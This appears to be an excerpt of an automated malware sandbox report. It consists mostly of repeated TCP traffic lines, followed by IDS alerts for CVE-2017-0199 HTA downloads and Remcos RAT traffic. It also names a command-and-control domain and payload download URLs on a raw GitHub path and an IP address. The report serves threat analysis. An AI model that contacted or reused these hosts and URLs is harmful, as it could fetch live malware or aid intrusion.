                    Source: global trafficTCP traffic: 213.183.76.21:443 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 213.183.76.21:443 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 213.183.76.21:443 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 213.183.76.21:443 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49169

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.220.20:80 -> 192.168.2.22:49168
                    Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.220.20:80 -> 192.168.2.22:49166
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49177 -> 135.148.195.248:6875
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49173 -> 135.148.195.248:6875
                    Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49179 -> 192.3.220.20:80
                    Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 192.3.220.20:80 -> 192.168.2.22:49172
                    Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 192.3.220.20:80 -> 192.168.2.22:49172
                    Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 192.3.220.20:80 -> 192.168.2.22:49181
                    Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 192.3.220.20:80 -> 192.168.2.22:49181
                    Source: Malware configuration extractorURLs: idabo.duckdns.org
                    Source: unknownDNS query: name: idabo.duckdns.org
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 135.148.195.248:6875
                    Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /97/RFGBVV.txt HTTP/1.1Host: 192.3.220.20Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /97/RFGBVV.txt HTTP/1.1Host: 192.3.220.20Connection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 135.148.195.248 135.148.195.248
                    Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
